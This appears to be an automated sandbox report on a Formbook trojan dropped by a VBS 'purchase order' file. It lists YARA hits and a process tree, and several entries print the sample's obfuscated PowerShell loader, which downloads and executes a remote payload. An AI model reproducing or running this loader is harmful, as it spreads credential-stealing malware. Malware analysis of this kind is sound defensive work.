Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF81CC 13_2_02FF81CC
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4B1B0 13_2_02F4B1B0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F2F172 13_2_02F2F172
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F7516C 13_2_02F7516C
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FC8158 13_2_02FC8158
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FDA118 13_2_02FDA118
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F30100 13_2_02F30100
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5C6E0 13_2_02F5C6E0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF16CC 13_2_02FF16CC
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F3C7C0 13_2_02F3C7C0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFF7B0 13_2_02FFF7B0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F40770 13_2_02F40770
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F64750 13_2_02F64750
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FEE4F6 13_2_02FEE4F6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_03000591 13_2_03000591
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F31460 13_2_02F31460
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF2446 13_2_02FF2446
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFF43F 13_2_02FFF43F
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FDD5B0 13_2_02FDD5B0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF7571 13_2_02FF7571
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F40535 13_2_02F40535
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FEDAC6 13_2_02FEDAC6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FDDAAC 13_2_02FDDAAC
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F85AA0 13_2_02F85AA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F3EA80 13_2_02F3EA80
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FB3A6C 13_2_02FB3A6C
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFA49 13_2_02FFFA49
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF7A46 13_2_02FF7A46
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FB5BF0 13_2_02FB5BF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F7DBF9 13_2_02F7DBF9
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF6BD7 13_2_02FF6BD7
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5FB80 13_2_02F5FB80
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFB76 13_2_02FFFB76
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFAB40 13_2_02FFAB40
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F6E8F0 13_2_02F6E8F0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F438E0 13_2_02F438E0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F268B8 13_2_02F268B8
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0300A9A6 13_2_0300A9A6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F42840 13_2_02F42840
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4A840 13_2_02F4A840
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FAD800 13_2_02FAD800
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F429A0 13_2_02F429A0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F56962 13_2_02F56962
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F49950 13_2_02F49950
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5B950 13_2_02F5B950
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFEEDB 13_2_02FFEEDB
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F49EB0 13_2_02F49EB0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F52E90 13_2_02F52E90
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFCE93 13_2_02FFCE93
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F40E59 13_2_02F40E59
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFEE26 13_2_02FFEE26
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4CFE0 13_2_02F4CFE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F32FC8 13_2_02F32FC8
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFFB1 13_2_02FFFFB1
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F41F92 13_2_02F41F92
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FB4F40 13_2_02FB4F40
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F60F30 13_2_02F60F30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F82F28 13_2_02F82F28
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFF09 13_2_02FFFF09
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F30CF2 13_2_02F30CF2
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFCF2 13_2_02FFFCF2
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FE0CB5 13_2_02FE0CB5
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FB9C32 13_2_02FB9C32
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F40C00 13_2_02F40C00
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F3ADE0 13_2_02F3ADE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5FDC0 13_2_02F5FDC0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F58DBF 13_2_02F58DBF
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF7D73 13_2_02FF7D73
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF1D5A 13_2_02FF1D5A
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F43D40 13_2_02F43D40
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4AD00 13_2_02F4AD00
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A0CC0 13_2_003A0CC0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039104C 13_2_0039104C
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039C150 13_2_0039C150
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039A1D0 13_2_0039A1D0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B9740 13_2_003B9740
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A27D0 13_2_003A27D0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A27CB 13_2_003A27CB
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039BF30 13_2_0039BF30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039BF27 13_2_0039BF27
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20165130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20177E54 appears 88 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2019EA12 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2011B970 appears 266 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 201AF290 appears 105 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02F87E54 appears 91 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02FBF290 appears 105 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02F75130 appears 36 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02F2B970 appears 268 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: PO 26519PZ F30 59.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_4328.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1424, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4328, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@19/10@6/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Udjvne.Mai Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5elpknk4.obd.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO 26519PZ F30 59.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1424
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4328
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: PO 26519PZ F30 59.vbs ReversingLabs: Detection: 18%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO 26519PZ F30 59.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $" Jump to behavior
